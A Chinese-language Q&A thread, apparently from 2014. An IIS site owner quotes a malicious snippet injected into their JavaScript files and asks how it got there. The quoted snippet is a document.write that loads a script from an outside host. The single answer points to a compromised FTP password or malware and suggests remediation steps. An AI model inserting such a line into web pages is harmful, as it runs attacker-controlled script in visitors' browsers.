0

我的 IIS 服务器中有许多 javascript 和 html 文件。几天前,一些奇怪的代码注入到文件中。代码如下。

/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/

我已从所有 javascript 文件中删除了此代码。请帮助我了解这些代码是如何注入到我在服务器中的文件中的。我经历过 XSS 攻击。但我什么也找不到。提前致谢。

4

1 回答 1

1

如果您只有静态 HTML 和 JS 文件并且没有附加数据库,那么您的服务器可能已被入侵。要么您的 FTP 密码较弱,要么您重复使用电子邮件地址中的密码。

或者您的服务器或访问服务器的计算机感染了某些恶意软件。

  • 更改密码
  • 查看服务器日志以查找来自可疑 IP 地址的成功登录
  • 扫描您的系统以查找恶意软件
于 2014-04-04T08:53:48.417 回答